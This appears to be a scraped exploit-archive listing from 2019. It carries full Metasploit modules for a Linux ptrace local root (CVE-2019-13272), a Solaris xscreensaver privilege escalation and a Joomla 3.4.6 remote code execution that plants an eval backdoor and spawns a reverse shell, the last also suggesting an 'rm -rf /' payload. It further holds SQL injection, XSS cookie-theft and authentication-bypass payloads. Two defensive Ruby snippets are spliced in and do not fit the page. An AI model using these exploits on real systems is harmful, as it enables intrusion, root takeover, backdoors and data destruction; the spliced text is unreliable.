WordPress Sliced Invoices 3.8.2 SQL Injection


WordPress Sliced Invoices plugin versions 3.8.2 and below suffer from a remote SQL injection vulnerability.


MD5 | 9ded6b959b02e7be9501260e777779e3

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

1. Description:

The WordPress Sliced Invoices plugin with a version lower than 3.8.2 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept:

Authenticated SQL Injection:
- Using a WordPress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

Linux Polkit pkexec Helper PTRACE_TRACEME Local Root


This Metasploit module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME.


MD5 | a67b52657090e25d42aa370f66e7ca88

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
'Description' => %q{
This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
not over an SSH session, as it requires execution from within the context of
a user with an active Polkit agent.
In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
the recording of the credentials of a process that wants to create a ptrace
relationship, which allows local users to obtain root access by leveraging
certain scenarios with a parent-child process relationship, where a parent drops
privileges and calls execve (potentially allowing control by an attacker). One
contributing factor is an object lifetime issue (which can also cause a panic).
Another contributing factor is incorrect marking of a ptrace relationship as
privileged, which is exploitable through (for example) Polkit's pkexec helper
with PTRACE_TRACEME.
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # Discovery and exploit
'bcoles', # Metasploit module
'timwr', # Metasploit module
],
'References' => [
['CVE', '2019-13272'],
['EDB', '47133'],
['PACKETSTORM', '153663'],
['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
'PrependFork' => true,
},
'DisclosureDate' => 'Jul 4 2019'))
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def check
# Introduced in 4.10, but also backported
# Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
release = kernel_release
v = Gem::Version.new release.split('-').first

if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"

unless command_exists? 'pkexec'
vprint_error 'pkexec is not installed'
return CheckCode::Safe
end
vprint_good 'pkexec is installed'

arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"

loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
if loginctl_output =~ /Remote=yes/
print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
return CheckCode::Safe
end

CheckCode::Appears
end

def exploit
if is_root? && !datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end

unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
upload_and_chmodx(payload_file, generate_payload_exe)
register_file_for_cleanup(payload_file)

exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
end
register_file_for_cleanup(exploit_file)

print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo #{payload_file} | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end
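The check method above treats only kernels at or above 5.1.17 as safe, even though its own comment lists backported fixes for the 4.4, 4.9, 4.14 and 4.19 stable branches. The following is an added example (not part of the Metasploit module) that applies that per-branch table to a `uname -r` string; the function names are this example's own, and vendor backports that keep the upstream version string unchanged are still not detected.

```ruby
# Added example, not code from the module above: per-branch patch-state check
# for CVE-2019-13272 using the fixed versions listed in the module comment.
# Assumption: a distribution that backports the fix without bumping the
# upstream version string will still be reported as :vulnerable here.

# Upstream stable releases that carry the fix, keyed by "major.minor" branch.
FIXED_VERSIONS = {
  '4.4'  => '4.4.185',
  '4.9'  => '4.9.185',
  '4.14' => '4.14.133',
  '4.19' => '4.19.58',
  '5.1'  => '5.1.17'
}.freeze

# Parse a `uname -r` string such as "4.15.0-54-generic" into a Gem::Version of
# its upstream part ("4.15.0"); returns nil if nothing version-like is found.
def upstream_version(release)
  m = release.to_s.match(/\A(\d+\.\d+(?:\.\d+)?)/)
  m && Gem::Version.new(m[1])
end

# Returns :patched, :vulnerable, :unaffected or :unknown.
def cve_2019_13272_state(release)
  v = upstream_version(release)
  return :unknown unless v
  # The module's check already treats anything below 3.x as not vulnerable and
  # anything at or beyond the 5.1.17 fix as safe; keep both rules.
  return :unaffected if v < Gem::Version.new('3')
  return :patched if v >= Gem::Version.new('5.1.17')

  branch = v.segments[0, 2].join('.')
  fixed = FIXED_VERSIONS[branch]
  if fixed
    v >= Gem::Version.new(fixed) ? :patched : :vulnerable
  else
    # Branches with no listed stable fix (e.g. 4.15, 4.18, 5.0) received the
    # backported bug but no upstream stable fix; treat them as vulnerable.
    :vulnerable
  end
end
```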

Solaris xscreensaver Privilege Escalation


This Metasploit module exploits a vulnerability in xscreensaver versions since 5.06 on unpatched Solaris 11 systems which allows users to gain root privileges. xscreensaver allows users to create a user-owned file at any location on the filesystem using the -log command line argument introduced in version 5.06. This module uses xscreensaver to create a log file in /usr/lib/secure/, overwrites the log file with a shared object, and executes the shared object using the LD_PRELOAD environment variable. This module has been tested successfully on xscreensaver version 5.15 on Solaris 11.1 (x86) and xscreensaver version 5.15 on Solaris 11.3 (x86).


MD5 | 6839e7bec0a8edd74031049d0e2ff4f0

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris xscreensaver log Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in `xscreensaver` versions
since 5.06 on unpatched Solaris 11 systems which allows users
to gain root privileges.

`xscreensaver` allows users to create a user-owned file at any
location on the filesystem using the `-log` command line argument
introduced in version 5.06.

This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
overwrites the log file with a shared object, and executes the shared
object using the `LD_PRELOAD` environment variable.

This module has been tested successfully on:

xscreensaver version 5.15 on Solaris 11.1 (x86); and
xscreensaver version 5.15 on Solaris 11.3 (x86).
},
'References' =>
[
['CVE', '2019-3010'],
['EDB', '47509'],
['URL', 'https://seclists.org/fulldisclosure/2019/Oct/39'],
['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver'],
['URL', 'https://techblog.mediaservice.net/2019/10/local-privilege-escalation-on-solaris-11-x-via-xscreensaver/'],
['URL', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html']
],
'Notes' => { 'AKA' => ['raptor_xscreensaver'] },
'License' => MSF_LICENSE,
'Author' =>
[
'Marco Ivaldi', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2019-10-16',
'Privileged' => true,
'Platform' => ['solaris', 'unix'],
'Arch' => [ARCH_CMD],
'Targets' => [['Auto', {}]],
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_ksh',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptString.new('XSCREENSAVER_PATH', [true, 'Path to xscreensaver executable', '/usr/bin/xscreensaver']),
OptString.new('XORG_PATH', [true, 'Path to Xorg executable', '/usr/bin/Xorg'])
]
register_advanced_options [
OptString.new('Xdisplay', [true, 'Display to use if starting a new Xorg session', ':1']),
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end

def xscreensaver_path
datastore['XSCREENSAVER_PATH']
end

def xorg_path
datastore['XORG_PATH']
end

def mkdir(path)
vprint_status "Creating directory '#{path}'"
cmd_exec "mkdir -p '#{path}'"
register_dir_for_cleanup path
end

def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end

def upload_and_compile(path, data)
upload "#{path}.c", data

output = cmd_exec "PATH=\"$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin\" gcc -fPIC -shared -s -g -O2 -lc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end

register_file_for_cleanup path
end

def check
unless setuid? xscreensaver_path
vprint_error "#{xscreensaver_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{xscreensaver_path} is setuid"

unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'

xscreensaver_version = cmd_exec("#{xscreensaver_path} --help").to_s.scan(/^xscreensaver ([\d\.]+)/).flatten.first
if xscreensaver_version.to_s.eql? ''
vprint_error 'Could not determine xscreensaver version'
return CheckCode::Detected
end

# Bug introduced in version 5.06. Patched in version <~ 5.42.
unless Gem::Version.new(xscreensaver_version).between?(Gem::Version.new('5.06'), Gem::Version.new('5.41'))
vprint_error "xscreensaver version #{xscreensaver_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "xscreensaver version #{xscreensaver_version} appears to be vulnerable"

CheckCode::Appears
end

def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

# Set display
display = cmd_exec 'echo $DISPLAY'
kill_xorg = false

if display.to_s.blank?
display = datastore['Xdisplay']
print_status "Starting Xorg on display #{display} ..."
cmd_exec "#{xorg_path} #{display} & echo "
kill_xorg = true
else
print_status "Using Xorg display #{display} ..."
end

# Create writable log file in /usr/lib/secure/
lib_name = rand_text_alphanumeric 5..10
if cmd_exec("/usr/bin/file #{xscreensaver_path}").to_s.include? 'ELF 64-bit'
secure_path = "/usr/lib/secure/64/"
else
secure_path = "/usr/lib/secure/"
end
lib_path = "#{secure_path}#{lib_name}.so"

print_status "Creating log file #{lib_path} ..."
cmd_exec "umask 0; DISPLAY=#{display} #{xscreensaver_path} -display #{display} -log #{lib_path} & echo "

Rex.sleep(5)

cmd_exec 'pkill -U `whoami` -n xscreensaver'
if kill_xorg
cmd_exec 'pkill -U `whoami` -n Xorg'
end

unless writable? lib_path
fail_with Failure::NotVulnerable, "Could not create writable log file #{lib_path}"
end

register_file_for_cleanup lib_path

# Upload and compile shared object
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path

payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"

so = <<-EOF
#include <unistd.h>
void __attribute__((constructor)) cons() {
setuid(0);
setgid(0);
unlink("#{lib_path}");
execle("#{payload_path}", "", NULL, NULL);
_exit(0);
}
EOF

so_name = ".#{rand_text_alphanumeric 5..10}"
so_path = "#{base_path}/#{so_name}"
upload_and_compile so_path, so

# Overwrite newly created log file with compiled shared object
vprint_status "Writing shared object to #{lib_path}"
cmd_exec "cp '#{so_path}' '#{lib_path}'"

# Upload and execute payload
if payload.arch.first.to_s == 'cmd'
upload payload_path, "#!/bin/sh\n#{payload.encoded}"
else
upload payload_path, generate_payload_exe
end
chmod payload_path

print_status 'Executing payload...'
cmd_exec "LD_PRELOAD=#{lib_path} #{xscreensaver_path} --help & echo "
end
end

Rusty Joomla Unauthenticated Remote Code Execution


This Metasploit module exploits a PHP object injection vulnerability in Joomla version 3.4.6.


MD5 | 40a2c7517a1a512236449ed2d7eb3073

# Exploit Title: Joomla! 3.4.6 - Remote Code Execution (Metasploit)
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo
# Vendor Homepage: https://www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Joomla

def initialize(info = {})
super(update_info(info,
'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution',
'Description' => %q{
PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
The exploit will backdoor the configuration.php file in the root directory with an eval of a POST parameter.
That's because the exploit is more reliable (doesn't rely on commonly disabled functions).
For this reason, use it with caution and remember the house cleaning.
Btw, you can also edit this exploit and use whatever payload you want. Just modify the exploit object with
get_payload('your_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
},
'Author'=>
[
'Alessandro \'kiks\' Groppo @Hacktive Security',
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'],
['URL', 'https://github.com/kiks7/rusty_joomla_rce']
],
'Privileged' => false,
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]],
'DisclosureDate' => 'Oct 02 2019',
'DefaultTarget' => 0)
)

register_advanced_options(
[
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
])
end

def get_random_string(length=50)
source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a
key=""
length.times{ key += source[rand(source.size)].to_s }
return key
end

def get_session_token
# Get session token from cookies
vprint_status('Getting Session Token')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})

cook = res.headers['Set-Cookie'].split(';')[0]
vprint_status('Session cookie: ' + cook)
return cook
end

def get_csrf_token(sess_cookie)
vprint_status('Getting CSRF Token')

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'headers' => {
'Cookie' => sess_cookie,
}
})

html = res.get_html_document
input_field = html.at('//form').xpath('//input')[-1]
token = input_field.to_s.split(' ')[2]
token = token.gsub('name="','').gsub('"','')
if token then
vprint_status('CSRF Token: ' + token)
return token
end
print_error('Cannot get the CSRF Token ..')

end

def get_payload(function, payload)
# @function: The PHP Function
# @payload: The payload for the call
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
payload = 'http://l4m3rz.l337/;' + payload
final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
return final
end


def get_payload_backdoor(param_name)
# return the backdoor payload
# or better, the payload that will inject and eval function in configuration.php (in the root)
# As said in other part of the code. we cannot create new .php file because we cannot use
# the ? character because of the check on URI schema
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# This payload will append an eval() at the end of the configuration file
payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
template['PAYLOAD'] = payload
template['LENGTH'] = payload.length.to_s
template['FUNC_NAME'] = function
template['FUNC_LEN'] = function.length.to_s
return template

end


def check_by_exploiting
# Check that the target is vulnerable by exploiting it: try to inject a print_r('something')
# Get the Session and CSRF tokens
sess_token = get_session_token()
csrf_token = get_csrf_token(sess_token)

print_status('Testing with a POC object payload')

username_payload = '\\0\\0\\0' * 9
password_payload = 'AAA";'# close the prev object
password_payload += get_payload('print_r','IAMSODAMNVULNERABLE')# actual payload
password_payload += 's:6:"return":s:102:' # close cleanly the object
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'method' => 'POST',
'headers' =>
{
'Cookie' => sess_token,
},
'vars_post' => {
'username' => username_payload,
'password' => password_payload,
'option' => 'com_users',
'task' => 'user.login',
csrf_token => '1',
}
})
# Redirect in order to retrieve the output
if res.redirection then
res_redirect = send_request_cgi({
'method' => 'GET',
'uri' => res.redirection.to_s,
'headers' =>{
'Cookie' => sess_token
}
})

if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
return true
else
return false
end

end
end

def check
# Check if the target is UP and get the current version running by info leak
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
unless res
print_error("Connection timed out")
return Exploit::CheckCode::Unknown
end

# Parse XML to get the version
if res.code == 200 then
xml = res.get_xml_document
version = xml.at('version').text
print_status('Identified version ' + version)
if Gem::Version.new(version).between?(Gem::Version.new('3.0.0'), Gem::Version.new('3.4.6')) then
if check_by_exploiting()
return Exploit::CheckCode::Vulnerable
else
if check_by_exploiting() then
# Try the POC 2 times.
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
else
return Exploit::CheckCode::Safe
end
else
print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
if check_by_exploiting() then
return Exploit::CheckCode::Vulnerable
else
if check_by_exploiting() then
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
end
end




def exploit
if check == Exploit::CheckCode::Safe && !datastore['FORCE']
print_error('Target is not vulnerable')
return
end


pwned = false
cmd_param_name = get_random_string(50)

sess_token = get_session_token()
csrf_token = get_csrf_token(sess_token)

# In order to avoid problems with disabled functions
# we are going to append an eval() function at the end of the configuration.php file.
# This will not cause any problem to Joomla and is a good way to execute PHP directly,
# because assert is too annoying and with the conditions we have we cannot inject some characters.
# So we will use 'assert' with file_put_contents to append the string, then create a reverse shell with this backdoor.
# Also, we cannot create a new file because we cannot use the '?' character needed for it to be interpreted by the web server.

# TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
# Use the implanted backdoor to receive a nice little reverse shell with a PHP payload


# Implant the backdoor
vprint_status('Cooking the exploit ..')
username_payload = '\\0\\0\\0' * 9
password_payload = 'AAA";'# close the prev object
password_payload += get_payload_backdoor(cmd_param_name)# actual payload
password_payload += 's:6:"return":s:102:' # close cleanly the object

print_status('Sending exploit ..')


res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'method' => 'POST',
'headers' => {
'Cookie' => sess_token
},
'vars_post' => {
'username' => username_payload,
'password' => password_payload,
'option' => 'com_users',
'task' => 'user.login',
csrf_token => '1'
}
})

print_status('Triggering the exploit ..')
if res.redirection then
res_redirect = send_request_cgi({
'method' => 'GET',
'uri' => res.redirection.to_s,
'headers' =>{
'Cookie' => sess_token
}
})
end

# Ping the backdoor see if everything is ok :/
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'configuration.php'),
'vars_post' => {
cmd_param_name => 'echo \'PWNED\';'
}
})
if res.to_s.include? 'PWNED' then
print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')

print_status('Now it\'s time to reverse shell')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'configuration.php'),
'vars_post' => {
cmd_param_name => payload.encoded
}
})
end

end
end

PHP-FPM Remote Code Execution


This is a newer method to exploit php-fpm to achieve remote code execution when certain nginx with php-fpm configurations exist.


MD5 | 4cbdb53c733266a5189ec2df70c12e1b


AUO SunVeillance Monitoring System 1.1.9e Incorrect Access Control


AUO SunVeillance Monitoring System version 1.1.9e suffers from an incorrect access control vulnerability.


MD5 | a64c3867cfeab198ca45b32478b4e026

# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
# Date: 2019-10-24
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: N/A

# 1. Description:
# An issue was discovered in AUO SunVeillance Monitoring System.
# There is an incorrect access control vulnerability that can allow the attacker to
# bypass the authentication mechanism, and upload files to the server without any authentication.

# 2. Proof of Concept:
(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without
any authentication. As a guest, the user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx.
(2) Modify the value of the parameter authority from 40 to 100. The upload button becomes enabled.
(3) Now a file can be uploaded successfully.
(4) The uploaded file is stored on the server side. This means any user without authentication can upload files to the server.

Thank you for your kind assistance.

Luca

AUO SunVeillance Monitoring System 1.1.9e SQL Injection


AUO SunVeillance Monitoring System version 1.1.9e suffers from a remote SQL injection vulnerability.


MD5 | cb88999045c0b158e26b0f828e5d1b5c

# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
# Date: 2019-10-24
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: N/A

# 1. Description:
# All versions of AUO SunVeillance Monitoring System prior to v1.1.9e are vulnerable to SQL injection.
# The vulnerability allows an attacker to inject malicious SQL commands into the server, which allows
# the attacker to read privileged data.

# 2. Proof of Concept:

(1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication.
There is a parameter, MailAdd, in mvc_send_mail.aspx.
(2) Modify the value of the parameter MailAdd with a single quotation mark. The error message contains Oracle database information.
(3) By using the sqlmap tool, an attacker can acquire the list of databases on the server side.

cmd: sqlmap.py -u "https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=" -p MailAdd --dbs

(4) Furthermore, there are a few SQL injection vulnerabilities in other fields.

picture_manage_mvc.aspx (parameter: plant_no)
swapdl_mvc.aspx (parameter: plant_no)
account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code)

Thank you for your kind assistance.

Luca


CWP 0.9.8.885 Cross Site Scripting


CWP version 0.9.8.885 suffers from a persistent cross site scripting vulnerability.


MD5 | 34665ba46764bcee8216ca2b204b6d30

# Exploit Title: CWP (CentOS Control Web Panel) Store Cross Site Scripting
# Date: 25 Oct 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.885
# CVE : CVE-2019-16295

+++++++++++++++++++++++++++++++++
# Description:
+++++++++++++++++++++++++++++++++

Users can add an XSS payload in the Directory Name, Filename and file extension fields of the "File Manager" function.

+++++++++++++++++++++++++++++++++
# Steps to Reproduce
+++++++++++++++++++++++++++++++++

1. In user panel go to File Management --> File Manager
2. Go to "Create Directory" or "Create File" and insert XSS payload "<img src=x onerror=javascript&colon;alert&lpar;document&period;cookie&rpar;>"
3. XSS will trigger.
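As an added illustration (not part of the advisory), the following Ruby shows why the entity-encoded payload from step 2 slips past a naive keyword blacklist, and how contextual HTML escaping of the stored name renders it inert. The function names are this example's own, and the sample string is constructed from the payload above.

```ruby
require 'cgi'

# Constructed sample: the entity-encoded payload quoted in the advisory.
XSS_FILENAME = '<img src=x onerror=javascript&colon;alert&lpar;document&period;cookie&rpar;>'.freeze

# A naive blacklist of the kind the entity-encoded payload slips past: it
# looks for literal "javascript:" and "alert(", but the stored string holds
# "javascript&colon;" and "alert&lpar;", which the browser decodes back to
# ":" and "(" only when it parses the attribute value.
def naive_blacklist_allows?(name)
  !name.downcase.match?(/javascript:|alert\(/)
end

# Contextual output encoding: escape the HTML metacharacters so the name is
# rendered as text. Because "&" becomes "&amp;", the browser never decodes
# &colon; / &lpar; into punctuation, and "<" becomes "&lt;", so no <img>
# element is created at all.
def render_entry_name(name)
  CGI.escapeHTML(name)
end

# True when the rendered string can still open a tag or carries an entity the
# browser would decode, i.e. when escaping was skipped or insufficient.
def renders_as_markup?(rendered)
  rendered.include?('<') || rendered.match?(/&(?!amp;|lt;|gt;|quot;|#39;)[a-z]+;/)
end
```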

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-16295.md

+++++++++++++++++++++++++++++++++
# Timeline
+++++++++++++++++++++++++++++++++

2019-07-19: Discovered the bug
2019-07-19: Reported to vendor
2019-07-23: Vendor accepted the vulnerability
2019-10-23: The vulnerability has been fixed
2019-10-25: Advisory published

+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++

Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Part-DB 0.4 Authentication Bypass


Part-DB version 0.4 suffers from an authentication bypass vulnerability.


MD5 | 564eee3c1b4080711aa2b50be9d6bae7

# Exploit Title: Part-DB 0.4 - Authentication Bypass
# Date: 2019-10-26
# Author: Marvoloo
# Vendor Homepage: https://github.com/Part-DB/Part-DB/
# Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip
# Version: 0.4
# Tested on: Linux
# CVE : N/A

# Description:
# An easy authentication bypass vulnerability in the application
# allows the attacker to log in

# url: http://localhost/login.php
# Parameter & Payload:

'=''or'

#vulnerable file: login.php Line: 29,30

#POC
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: ....
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

JumpStart 0.6.0.0 Unquoted Service Path


JumpStart version 0.6.0.0 suffers from a jswpbapi unquoted service path vulnerability.


MD5 | 0ba7b4891e75af644ad774a1f58f9b8c

# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-09-09
# Exploit Author: Roberto Escamilla
# Vendor Homepage: https://www.inforprograma.net/
